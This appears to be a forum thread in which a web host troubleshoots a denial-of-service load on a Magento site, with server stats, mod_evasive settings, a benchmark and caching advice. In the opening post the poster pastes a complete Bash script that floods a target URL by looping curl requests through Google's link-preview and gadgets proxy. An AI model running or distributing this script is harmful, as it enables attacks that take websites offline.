i get to much server load and i cant get it off : Code: top - 14:28:32 up 4 min, 2 users, load average: 30.93, 10.74, 3.92 Tasks: 255 total, 50 running, 204 sleeping, 0 stopped, 1 zombie Cpu(s): 75.9%us, 20.8%sy, 0.0%ni, 0.0%id, 0.0%wa, 0.0%hi, 0.0%si, 3.3%st Mem: 4187996k total, 2799896k used, 1388100k free, 11716k buffers Swap: 8385920k total, 0k used, 8385920k free, 251072k cached PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 3112 web3 20 0 205m 26m 9260 R 8 0.6 0:05.90 php-cgi 3155 web3 20 0 224m 45m 9272 R 8 1.1 0:07.59 php-cgi 3000 web3 20 0 224m 44m 9272 R 8 1.1 0:08.55 php-cgi 3011 web3 20 0 230m 50m 9252 R 8 1.2 0:06.79 php-cgi 3099 web3 20 0 205m 26m 9260 R 8 0.6 0:06.87 php-cgi 3114 web3 20 0 223m 44m 9260 R 8 1.1 0:07.94 php-cgi 3317 web3 20 0 207m 28m 9264 R 8 0.7 0:03.57 php-cgi 3468 web3 20 0 208m 28m 9028 R 8 0.7 0:00.98 php-cgi 3477 web3 20 0 205m 24m 8876 R 8 0.6 0:00.91 php-cgi 3483 web3 20 0 204m 24m 8876 R 8 0.6 0:00.86 php-cgi 3484 web3 20 0 204m 24m 8876 R 8 0.6 0:00.85 php-cgi 3493 web3 20 0 204m 24m 8876 R 8 0.6 0:00.81 php-cgi 3517 web3 20 0 227m 47m 9204 R 8 1.2 0:00.69 php-cgi 2977 web3 20 0 220m 41m 9264 R 8 1.0 0:10.24 php-cgi 3009 web3 20 0 217m 38m 9248 R 8 0.9 0:09.99 php-cgi i using this DDoS to nuke who uses google: Code: #!/bin/bash # ElGATO # function start { echo "[*] Enviando `echo $2` Requisicoes..." for a in `seq $2` do id=$((RANDOM%3999999+3000000)) nohup curl "https://plus.google.com/_/sharebox/linkpreview/ c=$url&t=1&_reqid=$id&rt=j" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20110101 Firefox/6.0" > /dev/null 2>&1 & nohup curl "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=$urlclear&container=focus" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 & done echo "[*] ainda atacando `echo $urlclear`" echo "[*] zzzzz por 10 Secondos" sleep 10 start url $2 urlclear } echo 'ElGATO - X.L.' if [ "$#" -lt 2 ]; then echo "Uso: $0 <big file> <Requests>" echo "Example: $0 http://www.dominio.com/arquivogrande.tar.gz 1000" echo "" exit 0 fi case $2 in *[!0-9]* ) echo "$2 is not numeric" && exit 1;; esac echo "Atacar -->" $1 match1=/ repl1=%2F match2=: repl2=%3A url=$1 urlclear=$1 url=${url//$match1/$repl1} url=${url//$match2/$repl2} echo "" echo "[*] Loop! CTRL+C para parar" echo "" start url $2 urlclear i have used mode evasive and mod security to avoid that wihtout sucess . Anyone have a diferent idea ?
mod_evasive blocks by IP address,so if the google requests come from many different IP addresses, then mod_evasive might not be able to detect them when the request numbers are below the limits. You should try to lower the limits if your mod_evasive configuration. Beside that, you should check if your server can be speed up to handle the load better: 1) Install php5-xcache 2) use mysqltuner to optimize your mysql settings 3) Install offload caching plugins in your cms system.
i have tryed the config : <IfModule mod_evasive20.c> DOSHashTableSize 3097 DOSPageCount 3 DOSSiteCount 30 DOSPageInterval 30 DOSSiteInterval 60 DOSBlockingPeriod 10 DOSLogDir "/var/log/apache2/evasive" DOSEmailNotify [email protected] </IfModule> this one till show to me, but still without any effect in a MAGENTO website .... any ohter ideas ???
How many pages can your server deliver from your content system if you test it with apache bench? The command is e.g.: Code: ab -c 20 -n 100 http://www.yourdomain.tld/ Please disable mod_evasive before you run the test.
as you ask i take the mod_evasive off then, the test is here, tks for any help : root@alice:~# ab -c 20 -n 100 http://www.pimentawebstore.com.br/ This is ApacheBench, Version 2.3 <$Revision: 655654 $> Copyright 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/ Licensed to The Apache Software Foundation, http://www.apache.org/ Benchmarking www.pimentawebstore.com.br (be patient).....done Server Software: Apache/2.2.16 Server Hostname: www.pimentawebstore.com.br Server Port: 80 Document Path: / Document Length: 31209 bytes Concurrency Level: 20 Time taken for tests: 24.602 seconds Complete requests: 100 Failed requests: 0 Write errors: 0 Total transferred: 3169300 bytes HTML transferred: 3120900 bytes Requests per second: 4.06 [#/sec] (mean) Time per request: 4920.435 [ms] (mean) Time per request: 246.022 [ms] (mean, across all concurrent requests) Transfer rate: 125.80 [Kbytes/sec] received Connection Times (ms) min mean[+/-sd] median max Connect: 0 1 3.0 0 8 Processing: 1210 4717 1461.6 4370 10639 Waiting: 1208 4714 1460.8 4370 10639 Total: 1211 4718 1462.3 4370 10639 Percentage of the requests served within a certain time (ms) 50% 4370 66% 4549 75% 4846 80% 4962 90% 6949 95% 8037 98% 9486 99% 10639 100% 10639 (longest request) root@alice:~#
You can try Varnish to cache from apache i tried it its amazing you can also try unixy plugin to configure it from cpanel